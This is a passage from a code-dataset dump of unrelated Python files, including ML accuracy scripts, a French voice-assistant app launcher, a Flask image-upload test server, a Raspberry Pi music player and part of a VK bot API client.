\",lda_accuracy)\r\n print(\"gaussian acc: \",gaussian_accuracy)\r\n print(\"svc acc: \",svc_accuracy)\r\n print(\"-------------------------------\")\r\n \r\n tree_accuracies.append(tree_accuracy)\r\n neighbor_accuracies.append(neighbor_accuracy)\r\n logisticRegression_accuracies.append(logisticRegression_accuracy)\r\n lda_accuracies.append(lda_accuracy)\r\n gaussian_accuracies.append(gaussian_accuracy)\r\n svc_accuracies.append(svc_accuracy)\r\n\r\nprint(tree_accuracies)\r\nprint(neighbor_accuracies)\r\nprint(logisticRegression_accuracies)\r\nprint(lda_accuracies)\r\nprint(gaussian_accuracies)\r\nprint(svc_accuracies)\r\n\r\ntree_accuracies = np.array(tree_accuracies)\r\nneighbor_accuracies = np.array(neighbor_accuracies)\r\nlogisticRegression_accuracies = np.array(logisticRegression_accuracies)\r\nlda_accuracies = np.array(lda_accuracies)\r\ngaussian_accuracies = np.array(gaussian_accuracies)\r\nsvc_accuracies = np.array(svc_accuracies)\r\nsplits = np.array(splits)\r\n\r\ntree_pickle = 'tree_accuracies.pickle'\r\nneighbor_pickle = 'neighbor_accuracies.pickle'\r\nsplit_pickle = 'splits.pickle'\r\nlogRegression_pickle = 'logisticRegression.pickle'\r\nlda_pickle = 'lda.pickle'\r\ngaussian_pickle = 'gaussian.pickle'\r\nsvc_pickle = 'svc.pickle'\r\n\r\nwith open(tree_pickle, 'wb') as f:\r\n pickle.dump(tree_accuracies, f)\r\n\r\nwith open(neighbor_pickle, 'wb') as f:\r\n pickle.dump(neighbor_accuracies, f)\r\n\r\nwith open(logRegression_pickle, 'wb') as f:\r\n pickle.dump(logisticRegression_accuracies, f)\r\n\r\nwith open(lda_pickle, 'wb') as f:\r\n pickle.dump(lda_accuracies, f)\r\n\r\nwith open(gaussian_pickle, 'wb') as f:\r\n pickle.dump(gaussian_accuracies, f)\r\n\r\nwith open(svc_pickle, 'wb') as f:\r\n pickle.dump(svc_accuracies, f)\r\n\r\nwith open(split_pickle, 'wb') as f:\r\n pickle.dump(splits, f)","sub_path":"Iris Play/mediumIris.py","file_name":"mediumIris.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"605812797","text":"\r\n\r\nimport FNDphase1webscrap as ws\r\n\r\n# Compare two news\r\n\r\nimport nltk\r\n\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\n \r\ndef match_news(news1, news2):\r\n \r\n # tokenization\r\n news1_list = word_tokenize(news1) \r\n news2_list = word_tokenize(news2)\r\n \r\n # sw contains the list of stopwords\r\n sw = stopwords.words('english') \r\n lst1 =[]\r\n lst2 =[]\r\n \r\n # remove stop words from the string\r\n news1_set = {w for w in news1_list if not w in sw} \r\n news2_set = {w for w in news2_list if not w in sw}\r\n \r\n # form a set containing keywords of both strings \r\n rvector = news1_set.union(news2_set) \r\n for w in rvector:\r\n if w in news1_set: \r\n lst1.append(1) # create a vector\r\n else: \r\n lst1.append(0)\r\n if w in news2_set:\r\n lst2.append(1)\r\n else:\r\n lst2.append(0)\r\n \r\n \r\n c = 0\r\n # cosine formula \r\n for i in range(len(rvector)):\r\n c+= lst1[i]*lst2[i]\r\n cosine = c / float((sum(lst1)*sum(lst2))**0.5)\r\n #print(\"similarity: \", cosine)\r\n \r\n return cosine\r\n\r\n# match_news(\"i love chinies food\", 'i hate chinies food')\r\nnews1 = 'Tesla in Russia? Elon Musk says he is keen to open production hub for EVs'\r\nnews2 = \"Elon Musk said at a Kremlin conference that Tesla could build a factory in Russia: 'I think we're close to establishing a Tesla presence'\"\r\n\r\n#match_news(news1, news2)\r\n\r\nDATA_TO_COMPARE = []\r\n\r\nDATA = ws.DATA_SCRAPPED\r\nfor e in DATA:\r\n # print(\" >> >> \", e)\r\n v = match_news(e, news1)\r\n if v > 0.15:\r\n # print(\" >> >> \", e, \"\\n\\t\\t >> \", v)\r\n DATA_TO_COMPARE.append(e)\r\n \r\n \r\n#print(DATA_TO_COMPARE)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"FNDphase1match.py","file_name":"FNDphase1match.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"580814297","text":"# -*- coding: utf-8 -*-\n\n#Librairies\nimport os\nfrom gtts import gTTS #a besoin d'une connexion internet pour etre utilise\n\ndef init():\n \"\"\"\n Fonction init():\n Parametre : none\n Definition des variables globales de l'application.\n \"\"\"\n global verb_exec_app\n global mot_exec_app\n verb_exec_app=['ouvre','ouvrir','execute','executer']\n mot_exec_app=['spotify','atom','nmap']\n\n#fonctions\ndef main():\n init()\n\n start=input() #test avec saisie et non avec micro\n\n if checkStart(start): #check si jarvis est appelé\n phrase=input()\n res = analysePhrase(phrase)\n if res == 0:\n print(\"Error: Action Inconnue \\n\")\n elif res == 1:\n print(\"Error: Application Inconnue \\n\")\n elif res == 2:\n print(\"No Error \\n\")\n\n\ndef checkStart(start_user): #check jarvis call\n \"\"\"\n Fonction checkStart():\n Parametre : str[]\n Definition: Prend en parametre la saisie de l'utilisateur des le premier demarrage et check si le premier mot est \"jarvis\"\n Return True si le mot est jarvis et False si non.\n \"\"\"\n Mot_user = start_user.split()#split de la phrase\n\n if Mot_user[0] == \"jarvis\" or Mot_user[0] == \"JARVIS\" or Mot_user[0] == \"Jarvis\" : #check si jarvis est appelé\n\n Talk(\"Bonjour ! que puis-je faire pour vous ?\") #voir pour randomiser la phrase de début\n\n #print(\"Bonjour ! que puis-je faire pour vous ?\")\n\n return True\n\n elif Mot_user[0] ==\"exit\":\n\n return False\n\n #FIif\n#FIcheckStart\n\ndef estunVerbe(mot):\n \"\"\"\n Fonction estunVerbe():\n Parametre : str\n Definition: Prend en Parametre un mot et check si celui si est dans la liste des verbes (Global verb_exec_app)\n Return True si le mot est dans le tableau et False si non.\n \"\"\"\n if mot in verb_exec_app:\n return True\n else:\n return False\n #FIif\n#FIestunVerbe\n\ndef estuneApp(mot):\n \"\"\"\n Fonction estuneApp():\n Parametre : str\n Definition: Prend en Parametre un mot et check si celui si est dans la liste des applications (Global mot_exec_app)\n Return True si le mot est dans le tableau et False si non.\n \"\"\"\n if mot in mot_exec_app: #global variable\n return True\n else:\n return False\n #FIif\n#FIestuneApp\n\ndef Talk(audio):\n \"\"\"\n Fonction Talk():\n Parametre : str[]\n Definition: Prend en parametre un texte pour l'enregistrer au format mp3 et ensuite le lire par la librairie gTTs\n \"\"\"\n print(audio)\n tts = gTTS(text=audio, lang='fr')\n tts.save(\"talk.mp3\")\n os.system(\"mpg123 talk.mp3\")\n#FITalk\n\ndef analysePhrase(phrase_user): #check sentence user\n\n \"\"\"Fonction analysePhrase():\n Parametre : str[]\n Definition: Prend en parametre la phrase de l'utilisateur.\n Check si elle contient un verbe d'action. check si elle contient une application a executer\n Return 0 si il n'y a pas de verbe connue par le script.\n Return 1 si il n'y a pas d'aplication connue par le script\n Return 2 si tout est ok\"\"\"\n\n run_app=\"\"\n test=\"\"\n check=0\n mots_user = phrase_user.split() #on split les mots\n nbmots_user = len(phrase_user.split())\n\n #for\n for i in range(nbmots_user):\n\n if estunVerbe(mots_user[i]):\n test=\"Très bien, j'execute \"\n check=1\n elif estuneApp(mots_user[i]):\n test += mots_user[i]\n run_app=mots_user[i]\n else:\n pass\n #FIif\n\n #FIfor\n if check==0:\n notunderstand=\"Je n'ai pas compris votre demande\"\n Talk(notunderstand)\n return 0\n elif run_app==\"\":\n run_app=\"Oups, je crois que je ne connais pas encore cette application\"\n Talk(run_app)\n #print(run_app)\n return 1\n else:\n print(test)\n Talk(test)\n os.system(run_app)\n return 2\n#FIanalysePhrase()\n\n\n#Start\nmain()\n","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202767845","text":"#!/usr/bin/env python\n\n# Copyright 2016 François 'ftiff' Levaux-Tiffreau\n# \n# Set a list of certificate names you expect to have. \n# This script will output the list of certs that are missing.\n# eg. Missing certificate(s): [''MyDummyCert1]\n\nimport subprocess\n\ncertificate_names = [\n 'MyDummyCert1',\n 'MyDummyCert2'\n]\n\nmissing_certificates = []\n\nfor certificate in certificate_names:\n result = subprocess.call([\n 'security',\n 'find-certificate',\n '-c',\n certificate\n ], stdin=None, stdout=None, stderr=None)\n #print('{} -> {}'.format(certificate, result))\n if result != 0:\n missing_certificates.append(certificate)\n \n\nif missing_certificates:\n print('Missing certificate(s): {}'.format(missing_certificates))\nelse:\n print('Certificates: OK!')\n","sub_path":"ExtensionAttributes/check_certificates.py","file_name":"check_certificates.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"267877578","text":"# coding: utf-8\n\n\"\"\"\n Bitbucket API\n\n Code against the Bitbucket API to automate simple tasks, embed Bitbucket data into your own site, build mobile or desktop apps, or even add custom UI add-ons into Bitbucket itself using the Connect framework. # noqa: E501\n\n The version of the OpenAPI document: 2.0\n Contact: support@bitbucket.org\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass PipelineVariable(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'key': 'str',\n 'secured': 'bool',\n 'uuid': 'str',\n 'value': 'str'\n }\n\n attribute_map = {\n 'key': 'key',\n 'secured': 'secured',\n 'uuid': 'uuid',\n 'value': 'value'\n }\n\n def __init__(self, key=None, secured=None, uuid=None, value=None): # noqa: E501\n \"\"\"PipelineVariable - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._key = None\n self._secured = None\n self._uuid = None\n self._value = None\n self.discriminator = None\n\n if key is not None:\n self.key = key\n if secured is not None:\n self.secured = secured\n if uuid is not None:\n self.uuid = uuid\n if value is not None:\n self.value = value\n\n @property\n def key(self):\n \"\"\"Gets the key of this PipelineVariable. # noqa: E501\n\n The unique name of the variable. # noqa: E501\n\n :return: The key of this PipelineVariable. # noqa: E501\n :rtype: str\n \"\"\"\n return self._key\n\n @key.setter\n def key(self, key):\n \"\"\"Sets the key of this PipelineVariable.\n\n The unique name of the variable. # noqa: E501\n\n :param key: The key of this PipelineVariable. # noqa: E501\n :type: str\n \"\"\"\n\n self._key = key\n\n @property\n def secured(self):\n \"\"\"Gets the secured of this PipelineVariable. # noqa: E501\n\n If true, this variable will be treated as secured. The value will never be exposed in the logs or the REST API. # noqa: E501\n\n :return: The secured of this PipelineVariable. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._secured\n\n @secured.setter\n def secured(self, secured):\n \"\"\"Sets the secured of this PipelineVariable.\n\n If true, this variable will be treated as secured. The value will never be exposed in the logs or the REST API. # noqa: E501\n\n :param secured: The secured of this PipelineVariable. # noqa: E501\n :type: bool\n \"\"\"\n\n self._secured = secured\n\n @property\n def uuid(self):\n \"\"\"Gets the uuid of this PipelineVariable. # noqa: E501\n\n The UUID identifying the variable. # noqa: E501\n\n :return: The uuid of this PipelineVariable. # noqa: E501\n :rtype: str\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, uuid):\n \"\"\"Sets the uuid of this PipelineVariable.\n\n The UUID identifying the variable. # noqa: E501\n\n :param uuid: The uuid of this PipelineVariable. # noqa: E501\n :type: str\n \"\"\"\n\n self._uuid = uuid\n\n @property\n def value(self):\n \"\"\"Gets the value of this PipelineVariable. # noqa: E501\n\n The value of the variable. If the variable is secured, this will be empty. # noqa: E501\n\n :return: The value of this PipelineVariable. # noqa: E501\n :rtype: str\n \"\"\"\n return self._value\n\n @value.setter\n def value(self, value):\n \"\"\"Sets the value of this PipelineVariable.\n\n The value of the variable. If the variable is secured, this will be empty. # noqa: E501\n\n :param value: The value of this PipelineVariable. # noqa: E501\n :type: str\n \"\"\"\n\n self._value = value\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, PipelineVariable):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitbucketopenapi/models/pipeline_variable.py","file_name":"pipeline_variable.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"85257015","text":"from flask import Flask, request, jsonify, Response\nimport numpy as np\napp = Flask(__name__)\nimport base64\nimport matplotlib.pyplot as plt\nimport cv2\n\n\n@app.route('/trackHeadTask', methods=['POST'])\ndef trackHeadTask():\n file = request.files['file']\n imageStr = base64.b64encode(file.read())\n imageDict = {'image': imageStr}\n print(imageDict)\n imgByte = base64.b64decode(imageStr)\n npArray = np.asarray(bytearray(imgByte))\n img = cv2.imdecode(npArray, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n print(img.shape)\n plt.imshow(img)\n plt.show()\n return (jsonify(), 200)\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET,POST') # Put any other methods you need here\n return response\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=6006)","sub_path":"ServerTest.py","file_name":"ServerTest.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"406258988","text":"#!/usr/bin/env python\n# coding=utf-8\nimport time,threading,self_function\nimport encodings.idna,sixmic_control,navigation_model\n\ndef get_status_information():\n while True:\n try:\n #运动导航状态信息监控\n navigation_model.status_navigtion_monitor()\n navigation_model.status_status_monitor()\n except Exception as e :\n with open('zjgg_err.txt','a') as code:\n code.write(str(e) + 'get_status_information \\n')\n \ndef deal_status():\n while True:\n try:\n #语音信息处理\n self_function.voice_deal_status()\n #运动信息处理\n self_function.motion_deal_status()\n except Exception as e :\n with open('zjgg_err.txt','a') as code:\n code.write(str(e) + 'deal_status \\n')\n\nif __name__ == '__main__':\n try:\n sixmic_control.port_open()\n \n i =3\n while(i):\n sixmic_control.send(sixmic_control.buildShakePacket())\n time.sleep(1)\n i -= 1\n print(\"开始运行了!\")\n \n #t1 = threading.Thread(target = navigation_model.status_navigtion_monitor)\n t2 = threading.Thread(target = navigation_model.status_monitor)\n t3 = threading.Thread(target = deal_status)\n t4 = threading.Thread(target = sixmic_control.receive_voice)\n Threads = [t2,t3,t4]\n for t in Threads:\n t.start()\n \n self_function.zjgg_presentation()\n \n except Exception as e:\n with open('zjgg_err.txt','a') as code:\n code.write(str(e) + 'zjgg_err \\n')\n \n","sub_path":"presentation_project_model/更改导航程序/zjgg_presentation.py","file_name":"zjgg_presentation.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"39379768","text":"# COMECE COPIANDO AQUI O SEU CÓDIGO DA IMPLEMENTAÇÃO\n# DEPOIS FAÇA OS NOVOS RECURSOS# importação de bibliotecas\nfrom os import system\nfrom mplayer import Player\nfrom gpiozero import LED\nfrom gpiozero import Button\nfrom time import sleep\nfrom Adafruit_CharLCD import Adafruit_CharLCD\n# para de tocar músicas que tenham ficado tocando da vez passada\nsystem(\"killall mplayer\")\n\n\n# definição de funções\n\ndef Play():\n player.pause()\n if player.paused:\n led1.blink()\n else:\n led1.on()\n\ndef Avança():\n player.speed=2\n\ndef Passa():\n if player.speed == 1:\n player.pt_step(1)\n else:\n player.speed = 1\n\ndef Recua():\n if player.time_pos>2:\n player.time_pos=0\n else:\n player.pt_step(-1)\n\n\n\n# criação de componentes\nplayer = Player()\nplayer.loadlist(\"playlist.txt\")\n\nb1 = Button(11)\nb1.when_pressed = Recua\nb2 = Button(12)\nb2.when_pressed = Play\nb3 = Button(13)\nb3.when_held = Avança\nb3.when_released = Passa\nled1 = LED(21)\nled3 = LED(23)\nled3.off()\nled1.on()\nlcd = Adafruit_CharLCD(2, 3, 4, 5, 6, 7, 16, 2)\npos = player.time_pos\nn=0\n# loop infinito\nwhile True:\n pos = player.time_pos\n Mpos = pos/60\n Spos = pos%60\n t = player.length\n Mt = t/60\n St = t%60\n metadados = player.metadata\n if metadados !=None:\n lcd.clear()\n \n lcd.message(metadados[\"Title\"][n:16+n] + \"\\n\" + \"%.2d\" % Mpos + \":\" + \"%.2d\" % Spos + \" de %.2d\" %Mt + \":%.2d\" %St)\n if (len(metadados[\"Title\"])-n)> 16:\n n += 1\n else:\n n=0\n sleep(0.2)\n\n","sub_path":"Lab01/01c_aperfeicoamento.py","file_name":"01c_aperfeicoamento.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"331764976","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param root: the root of binary tree\n @param v: a integer\n @param d: a integer\n @return: return a TreeNode\n \"\"\"\n\n def addOneRow(self, root, v, d):\n # write your code here\n def sol1(): # dfs\n def insert(val, node, depth, n):\n if not node: return\n if depth == n - 1:\n node.left, node.left.left = TreeNode(val), node.left\n node.right, node.right.right = TreeNode(val), node.right\n else:\n insert(val, node.left, depth + 1, n)\n insert(val, node.right, depth + 1, n)\n\n if d == 1:\n node = TreeNode(v)\n node.left = root\n return node\n insert(v, root, 1, d)\n return root\n\n def sol2(): # bfs\n if d == 1:\n node = TreeNode(v)\n node.left = root\n return node\n queue, depth = [root], 1\n while depth < d - 1:\n tmp = []\n while queue:\n node = queue.pop()\n if node.left: tmp.append(node.left)\n if node.right: tmp.append(node.right)\n queue = tmp\n depth += 1\n while queue:\n node = queue.pop()\n node.left, node.left.left = TreeNode(v), node.left\n node.right, node.right.right = TreeNode(v), node.right\n return root\n\n return sol1()\n","sub_path":"lintcode/1122-add-one-row-to-tree.py","file_name":"1122-add-one-row-to-tree.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419576096","text":"\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2019 MrDandycorn\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport asyncio\nimport sys\nimport traceback\nimport aiohttp\nimport enum\nfrom random import randint\n\nfrom vk_botting.general import vk_request\nfrom vk_botting.user import get_own_page, get_pages, get_users, get_blocked_user, get_unblocked_user, User\nfrom vk_botting.group import get_post, get_board_comment, get_market_comment, get_photo_comment, get_video_comment, get_wall_comment, get_deleted_photo_comment,\\\n get_deleted_video_comment, get_deleted_board_comment, get_deleted_market_comment, get_deleted_wall_comment, get_officers_edit, get_poll_vote, get_groups, Group\nfrom vk_botting.attachments import get_photo, get_video, get_audio\nfrom vk_botting.message import build_msg, build_user_msg\nfrom vk_botting.states import get_state\nfrom vk_botting.exceptions import VKApiError, LoginError\n\n\nclass UserMessageFlags(enum.IntFlag):\n Unread = 1,\n Outbox = 2,\n Replied = 4,\n Important = 8,\n Chat = 16,\n Friends = 32,\n Spam = 64,\n Deleted = 128,\n Fixed = 256,\n Media = 512,\n Hidden = 65536,\n DeleteForAll = 131072,\n NotDelivered = 262144\n\n\nclass _ClientEventTask(asyncio.Task):\n def __init__(self, original_coro, event_name, coro, *, loop):\n super().__init__(coro, loop=loop)\n self.__event_name = event_name\n self.__original_coro = original_coro\n\n def __repr__(self):\n info = [\n ('state', self._state.lower()),\n ('event', self.__event_name),\n ('coro', repr(self.__original_coro)),\n ]\n if self._exception is not None:\n info.append(('exception', repr(self._exception)))\n return ''.format(' '.join('%s=%s' % t for t in info))\n\n\nclass Client:\n\n def __init__(self, **kwargs):\n self.v = kwargs.get('v', '5.999')\n self.force = kwargs.get('force', False)\n self.loop = asyncio.get_event_loop()\n self.user = None\n self.group = None\n self.key = None\n self.server = None\n self.old_longpoll = kwargs.get('old_longpoll', False)\n self._listeners = {}\n timeout = aiohttp.ClientTimeout(total=100, connect=10)\n self.session = aiohttp.ClientSession(timeout=timeout)\n self._implemented_events = ['message_new', 'message_reply', 'message_allow', 'message_deny', 'message_edit', 'message_typing_state', 'photo_new', 'audio_new', 'video_new', 'wall_reply_new', 'wall_reply_edit', 'wall_reply_delete', 'wall_reply_restore', 'wall_post_new', 'wall_repost', 'board_post_new', 'board_post_edit', 'board_post_restore', 'board_post_delete', 'photo_comment_new', 'photo_comment_edit', 'photo_comment_delete', 'photo_comment_restore', 'video_comment_new', 'video_comment_edit', 'video_comment_delete', 'video_comment_restore', 'market_comment_new', 'market_comment_edit', 'market_comment_delete', 'market_comment_restore', 'poll_vote_new', 'group_join', 'group_leave', 'group_change_settings', 'group_change_photo', 'group_officers_edit', 'user_block', 'user_unblock']\n\n def Payload(self, **kwargs):\n kwargs['access_token'] = self.token\n kwargs['v'] = self.v\n return kwargs\n\n class botCommandException(Exception):\n pass\n\n def wait_for(self, event, *, check=None, timeout=None):\n future = self.loop.create_future()\n if check is None:\n def _check(*args):\n return True\n check = _check\n\n ev = event.lower()\n try:\n listeners = self._listeners[ev]\n except KeyError:\n listeners = []\n self._listeners[ev] = listeners\n\n listeners.append((future, check))\n return asyncio.wait_for(future, timeout, loop=self.loop)\n\n async def general_request(self, url, post=False, **params):\n for param in list(params):\n if params[param] is None:\n params.pop(param)\n elif not isinstance(params[param], (str, int)):\n params[param] = str(params[param])\n elif isinstance(params[param], bool):\n params[param] = str(params[param])\n for tries in range(5):\n try:\n req = self.session.post(url, data=params) if post else self.session.get(url, params=params)\n async with req as r:\n if r.content_type == 'application/json':\n return await r.json()\n return await r.text()\n except Exception as e:\n print(f'Got exception in request: {e}\\nRetrying in {tries*2+1} seconds', file=sys.stderr)\n await asyncio.sleep(tries*2+1)\n\n async def vk_request(self, method, **kwargs):\n res = await self.general_request(f'https://api.vk.com/method/{method}', **self.Payload(**kwargs))\n error = res.get('error', None)\n if error and error['error_code'] == 6:\n await asyncio.sleep(1)\n return await self.vk_request(method, **kwargs)\n return res\n\n async def enable_longpoll(self):\n events = dict([(event, 1) for event in self._implemented_events])\n res = await self.vk_request('groups.setLongPollSettings', group_id=self.group.id, enabled=1, api_version='5.103', **events)\n return res\n\n async def get_user_longpoll(self):\n res = await self.vk_request('messages.getLongPollServer', group_id=self.group.id, lp_version=3)\n error = res.get('error', None)\n if error and error['error_code'] == 15:\n raise LoginError('User has no access to messages API. Try generating token with vk_botting.auth methods')\n elif error and error['error_code'] == 100:\n if self.force:\n await self.enable_longpoll()\n return await self.get_longpoll_server()\n raise VKApiError('Longpoll is disabled for this group. Enable longpoll or try force mode')\n elif error:\n raise VKApiError(f'[{error[\"error_code\"]}]{error[\"error_msg\"]}')\n self.key = res['response']['key']\n server = res['response']['server'].replace(r'\\/', '/')\n self.server = f'https://{server}'\n ts = res['response']['ts']\n return ts\n\n async def get_longpoll_server(self):\n res = await self.vk_request('groups.getLongPollServer', group_id=self.group.id)\n error = res.get('error', None)\n if error and error['error_code'] == 100:\n if self.force:\n await self.enable_longpoll()\n return await self.get_longpoll_server()\n raise VKApiError('Longpoll is disabled for this group. Enable longpoll or try force mode')\n elif error:\n raise VKApiError(f'[{error[\"error_code\"]}]{error[\"error_msg\"]}')\n self.key = res['response']['key']\n self.server = res['response']['server'].replace(r'\\/', '/')\n ts = res['response']['ts']\n return ts\n\n async def longpoll(self, ts):\n payload = {'key': self.key,\n 'act': 'a_check',\n 'ts': ts,\n 'wait': '10'}\n if not self.is_group:\n payload['mode'] = 10\n try:\n res = await self.general_request(self.server, **payload)\n except asyncio.TimeoutError:\n return ts, []\n if 'ts' not in res.keys() or 'failed' in res.keys():\n ts = await self.get_longpoll_server()\n else:\n ts = res['ts']\n updates = res.get('updates', [])\n return ts, updates\n\n async def handle_update(self, update):\n t = update['type']\n if t == 'message_new':\n obj = update['object'] if self.old_longpoll else update['object']['message']\n msg = await build_msg(obj, self)\n return self.dispatch(t, msg)\n elif t == 'message_reply' and 'on_message_reply' in self.extra_events:\n obj = update['object']\n msg = await build_msg(obj, self)\n return self.dispatch(t, msg)\n elif t == 'message_edit' and 'on_message_edit' in self.extra_events:\n obj = update['object']\n msg = await build_msg(obj, self)\n return self.dispatch(t, msg)\n elif t == 'message_typing_state' and 'on_message_typing_state' in self.extra_events:\n obj = update['object']\n state = await get_state(self.token, obj)\n return self.dispatch(t, state)\n elif t in ['message_allow', 'message_deny'] and any(event in self.extra_events for event in ['on_message_allow', 'on_message_deny']):\n obj = update['object']\n user = await get_pages(self.token, obj)\n return self.dispatch(t, user[0])\n elif t == 'photo_new' and 'on_photo_new' in self.extra_events:\n obj = update['object']\n photo = await get_photo(self.token, obj)\n return self.dispatch(t, photo)\n elif t in ['photo_comment_new', 'photo_comment_edit', 'photo_comment_restore'] and any(event in self.extra_events for event in ['on_photo_comment_new', 'on_photo_comment_edit', 'on_photo_comment_restore']):\n obj = update['object']\n comment = await get_photo_comment(self.token, obj)\n return self.dispatch(t, comment)\n elif t == 'photo_comment_delete' and 'on_photo_comment_delete' in self.extra_events:\n obj = update['object']\n deleted = await get_deleted_photo_comment(self.token, obj)\n return self.dispatch(t, deleted)\n elif t == 'audio_new' and 'on_audio_new' in self.extra_events:\n obj = update['object']\n audio = await get_audio(self.token, obj)\n return self.dispatch(t, audio)\n elif t == 'video_new' and 'on_video_new' in self.extra_events:\n obj = update['object']\n video = await get_video(self.token, obj)\n return self.dispatch(t, video)\n elif t in ['video_comment_new', 'video_comment_edit', 'video_comment_restore'] and any(event in self.extra_events for event in ['on_video_comment_new', 'on_video_comment_edit', 'on_video_comment_restore']):\n obj = update['object']\n comment = get_video_comment(self.token, obj)\n return self.dispatch(t, comment)\n elif t == 'video_comment_delete' and 'on_video_comment_delete' in self.extra_events:\n obj = update['object']\n deleted = await get_deleted_video_comment(self.token, obj)\n return self.dispatch(t, deleted)\n elif t in ['wall_post_new', 'wall_repost'] and any(event in self.extra_events for event in ['on_wall_post_new', 'on_wall_repost']):\n obj = update['object']\n post = await get_post(self.token, obj)\n return self.dispatch(t, post)\n elif t in ['wall_reply_new', 'wall_reply_edit', 'wall_reply_restore'] and any(event in self.extra_events for event in ['on_wall_reply_new', 'on_wall_reply_edit', 'on_wall_reply_restore']):\n obj = update['object']\n comment = await get_wall_comment(self.token, obj)\n return self.dispatch(t, comment)\n elif t == 'wall_reply_delete' and 'on_wall_reply_delete' in self.extra_events:\n obj = update['object']\n deleted = await get_deleted_wall_comment(self.token, obj)\n return self.dispatch(t, deleted)\n elif t in ['board_post_new', 'board_post_edit', 'board_post_restore'] and any(event in self.extra_events for event in ['on_board_post_new', 'on_board_post_edit', 'on_board_post_restore']):\n obj = update['object']\n comment = await get_board_comment(self.token, obj)\n return self.dispatch(t, comment)\n elif t == 'board_post_delete' and 'on_board_post_delete' in self.extra_events:\n obj = update['object']\n deleted = await get_deleted_board_comment(self.token, obj)\n return self.dispatch(t, deleted)\n elif t in ['market_comment_new', 'market_comment_edit', 'market_comment_restore'] and any(event in self.extra_events for event in ['on_market_comment_new', 'on_market_comment_edit', 'on_market_comment_restore']):\n obj = update['object']\n comment = await get_market_comment(self.token, obj)\n return self.dispatch(t, comment)\n elif t == 'market_comment_delete' and 'on_market_comment_delete' in self.extra_events:\n obj = update['object']\n deleted = await get_deleted_market_comment(self.token, obj)\n return self.dispatch(t, deleted)\n elif t == 'group_leave' and 'on_group_leave' in 